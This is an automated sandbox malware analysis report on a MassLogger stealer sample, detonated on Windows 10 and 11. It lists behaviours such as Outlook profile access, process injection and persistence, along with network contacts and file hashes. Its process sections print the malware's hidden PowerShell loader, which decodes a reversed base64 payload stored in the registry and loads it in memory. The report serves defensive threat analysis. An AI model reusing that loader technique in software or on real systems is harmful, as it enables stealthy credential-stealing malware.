Malware Analysis Report

2025-08-10 20:05

Sample ID 250704-n8e53ssqv7
Target Attachment.rar
SHA256 0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a
Tags
masslogger collection discovery execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a

Threat Level: Known bad

The file Attachment.rar was found to be: Known bad.

Malicious Activity Summary

masslogger collection discovery execution persistence spyware stealer

Masslogger family

MassLogger

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-04 12:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-04 12:03

Reported

2025-07-04 12:06

Platform

win10v2004-20250502-en

Max time kernel

143s

Max time network

142s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

Signatures

MassLogger

stealer spyware masslogger

Masslogger family

masslogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A
N/A reallyfreegeoip.org N/A N/A
N/A reallyfreegeoip.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2364 set thread context of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 680 wrote to memory of 2364 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 2364 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.80.1:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/2364-2-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp

memory/2364-1-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqcpt1ye.f54.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2364-12-0x000001FCBE5E0000-0x000001FCBE602000-memory.dmp

memory/2364-13-0x000001FCBCD60000-0x000001FCBCD6A000-memory.dmp

memory/2364-14-0x000001FCD6B70000-0x000001FCD6B7A000-memory.dmp

memory/3684-15-0x0000000000D10000-0x0000000000D2C000-memory.dmp

memory/3684-18-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/3684-19-0x0000000005200000-0x000000000529C000-memory.dmp

memory/3684-20-0x00000000063E0000-0x0000000006472000-memory.dmp

memory/3684-21-0x0000000006390000-0x00000000063E0000-memory.dmp

memory/3684-22-0x0000000006750000-0x0000000006912000-memory.dmp

memory/3684-23-0x00000000066F0000-0x00000000066FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS

MD5 1cacd0362bf0f7c175193309f29b89b1
SHA1 9806970450b0294338bc13fd80b7ae56841d24b0
SHA256 f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778
SHA512 a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507

Analysis: behavioral2

Detonation Overview

Submitted

2025-07-04 12:03

Reported

2025-07-04 12:06

Platform

win11-20250502-en

Max time kernel

144s

Max time network

111s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

Signatures

MassLogger

stealer spyware masslogger

Masslogger family

masslogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A
N/A reallyfreegeoip.org N/A N/A
N/A reallyfreegeoip.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3892 set thread context of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3868 wrote to memory of 3892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3868 wrote to memory of 3892 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
JP 132.226.8.169:80 checkip.dyndns.org tcp
US 104.21.112.1:443 reallyfreegeoip.org tcp
US 52.111.227.11:443 tcp

Files

memory/3892-1-0x00007FF817973000-0x00007FF817975000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_figmuiqx.hbx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3892-10-0x0000019F31710000-0x0000019F31732000-memory.dmp

memory/3892-11-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-12-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-13-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-14-0x0000019F19440000-0x0000019F1944A000-memory.dmp

memory/3892-15-0x0000019F31700000-0x0000019F3170A000-memory.dmp

memory/4040-16-0x0000000000540000-0x000000000055C000-memory.dmp

memory/4040-19-0x00000000751AE000-0x00000000751AF000-memory.dmp

memory/4040-20-0x00000000054F0000-0x0000000005A96000-memory.dmp

memory/4040-21-0x0000000004FE0000-0x000000000507C000-memory.dmp

memory/4040-22-0x0000000006000000-0x0000000006092000-memory.dmp

memory/4040-23-0x0000000005FB0000-0x0000000006000000-memory.dmp

memory/3892-24-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/4040-25-0x0000000006370000-0x0000000006532000-memory.dmp

memory/4040-26-0x0000000006300000-0x000000000630A000-memory.dmp

memory/4040-27-0x00000000751AE000-0x00000000751AF000-memory.dmp

C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS

MD5 1cacd0362bf0f7c175193309f29b89b1
SHA1 9806970450b0294338bc13fd80b7ae56841d24b0
SHA256 f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778
SHA512 a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507